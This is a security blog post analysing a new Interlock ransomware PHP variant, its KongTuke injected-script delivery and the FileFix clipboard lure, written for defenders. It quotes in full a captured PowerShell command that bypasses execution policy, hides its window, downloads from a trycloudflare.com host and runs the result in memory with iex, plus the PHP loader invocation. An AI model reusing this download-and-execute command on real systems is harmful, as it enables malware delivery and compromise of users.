Blog

Analyzing the new Interlock Malware PHP variant which uses updated KongTuke for delivery

Siddharth Singh
SecurityAnalyticsSecurityOperations

Introduction

Interlock ransomware is a Malware-As-A-Service (Maas) group which provides its affiliates with variations and evolutions of the Interlock malware. Having emerged in the late stages of 2024, it is a relatively new group to the ransomware scene. With operations similar to Lockbit but nowhere near the advertisement and self-promotion, they’ve chosen to lie low while choosing few high severity targets.

The malware loaders for these files originally were fake update files for Google Chrome and Microsoft Edge. Once executed, the fake installers for these updates run a PowerShell backdoor, and ultimately leads to the delivery of the ransomware. What soon set Interlock apart was its quick adoption of ClickFix attacks to spread their malware instead of relying on fake update files.

ClickFix

ClickFix is a sophisticated form of Social Engineering attack that relies on the use of CAPTCHA or fake update prompts to the user, instructing them to copy and paste ‘text’ from the website into their own command prompt/powershell/terminal or run window. This ‘text’ usually contains a command that instructs the machine to download and execute the malware loader or sometimes the malware itself. It is a new method of delivery of malware which relies on the user’s confusion regarding the CAPTCHA process or not being aware of the general commands required to download or update a software.

KongTuke

KongTuke is a malicious javascript code that is injected into a website which redirects the user from a legitimate but compromised website to a malicious website which masquerades as a ‘CAPTCHA’ verification prompt. What’s worth noting is that the script doesn’t always load the fake CAPTCHA as there is monitoring if the user’s environment is compatible with it. KongTuke was first found to be used in September 2024, with time its use has increased especially with the increase of ClickFix and FileFix as initial compromise vectors.

The Regex of the Injected Script is as follows: \d[a-z]\d[a-z]\.js

The injected JS file takes the following steps in the background in order to compromise the user:

  1. Cookie CheckingThe script creates a cookie called “isCompleted” which is kept as valid for 4 hours only, possibly to not leave traces. It also checks for whether a cookie named “isCompleted” already exists, if not, it proceeds as normal.
  2. Data CollectionThe script gathers information regarding the machine and sends it to a C2 (Command and Control) server. This information includes the details such as OS, IP Address, Current URL (Referrer), Browser Type, User-Agent string, Geolocation on the basis of the IP Address
  3. Next StageOn a successful response from the C2 server, it leads to the fake CAPTCHA webpage. In case of an unsuccessful response from the C2 server, it reloads the page.

New FileFix

KongTuke has recently moved to FileFix attacks instead of ClickFix attacks, this has been observed by security researchers widely. While ClickFix prompts the user to input the copied command into a Run box, FileFix places the command string onto the user’s clipboard and opens a “File Upload” window through Windows Explorer. Here it instructs the user to use the “Windows + L” shortcut to use the Address Bar and then to paste the command which is already present on their clipboard and press ‘Enter’. The clipboard contains a command to launch either cmd.exe or powershell.exe and further instructions to execute. What makes this more effective than ClickFix is that no error messages or warnings are prompted to the user. This command typically involves encoded PowerShell scripts that download and execute the malware.

In case of the delivery of the new Interlock RAT, the following code was found:

"powershell.exe" -ep Bypass -w H -c "schtasks /delete /tn Updater /f; $w=New-Object System.Net.WebClient ; $w.Headers.Add(\"User-Agent\", \"PowerShell\") ; $w.DownloadString(\"http://deadly-programming-attorneys-our.trycloudflare.com\") | iex"└── "C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1

As suggested, the first command launches an instance of powershell and provides a few flags:

  • -ep BypassBypasses the Execution Policy, thus disabling the powershell signing restrictions, if any
  • -w HOpens a windowed instance of powershell, but sets it to hidden, hence the user won’t view any powershell window opening

After the flag “-c” the actual command supplied to powershell begins within the double quotes; first the command deletes a scheduled task by the name “Updater”, including the /f flag to ensure the same; then it uses a Web Client with the User Agent set to Powershell to reach out to one of the domains that is hosting the malware and downloads the malware from this place as a string into memory. Finally, | ‘iex’ executes the downloaded string into memory, hence causing a file-less execution which makes it hard to detect this attack.

Interlock Variant

The next command that we see here begins the execution of the new Interlock variant malware:

“C:\Users\REDACTED\AppData\Roaming\php\php.exe” -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1

This command invokes a locally-stored version of PHP embedded within the user’s roaming profile-an increasingly common practice among malware authors to evade detection. The presence of the “-d extension=zip” and “-d extension_dir=ext” parameters suggests the attackers are relying on specific PHP extensions to unpack or process the “wefs.cfg” file. Notably, this file does not carry a conventional PHP file extension, likely a deliberate obfuscation choice to bypass static detection heuristics.

The trailing 1 is likely a custom flag or argument used internally by the malware for versioning or execution mode differentiation. Reverse engineering of the “wefs.cfg” content shows a highly obfuscated PHP loader that uses XOR-based string decryption routines and base64-encoded payloads, which are decoded and run in-memory. This results in the launch of the new Interlock Remote Access Trojan (RAT), exhibiting capabilities such as:

  • Reverse shell over HTTP/S
  • Keylogging
  • Clipboard hijacking
  • Targeted data exfiltration from browser profiles (Chromium and Firefox derivatives)
  • Enumeration of mounted network drives

What stands out in this Interlock PHP variant is its persistence mechanism. Unlike traditional methods like registry keys or scheduled tasks (the latter is deleted in the earlier PowerShell chain), the malware sets a recurring execution trigger via the Startup folder, disguising itself as a benign software component named “Adobe File Helper.” Additionally, mutex creation prevents re-infection on the same host; indicating a level of operational maturity and avoidance of unnecessary redundancy.

C2 Infrastructure and DNS Behavior

Tracking DNS queries made during the infection process has led to the identification of a cluster of fast-flux domains under trycloudflare.com subdomains. These serve as temporary reverse proxies that mask the true C2 location and rotate IP addresses rapidly. Passive DNS shows a TTL of as low as 60 seconds, with endpoints resolving to infrastructure hosted across Germany, Singapore, and the United States. The User-Agent string “PowerShell” in HTTP headers is a critical IOC, and so far, the payload URLs have followed the format:

http://<verb>-<adjective>-<noun>-<random>.trycloudflare.com

Examples:

This naming convention is likely autogenerated using a wordlist randomizer to avoid domain pattern blacklisting.

Conclusion

The new Interlock PHP variant shows significant evolution in both delivery and execution strategy. By leveraging techniques from social engineering to file-less payload delivery, the actors behind Interlock demonstrate a growing sophistication that aligns them with some of the more prominent MaaS providers. The move to use cloudflare tunnels as temporary infrastructure, along with behavioral persistence and memory execution, makes this threat especially evasive and dangerous. Organizations must prioritize detection at the behavioral level and adopt a layered security approach to stand a chance against such adversaries.

We use cookies to provide essential site functionality and, with your consent, to analyze site usage and enhance your experience. View our Privacy Policy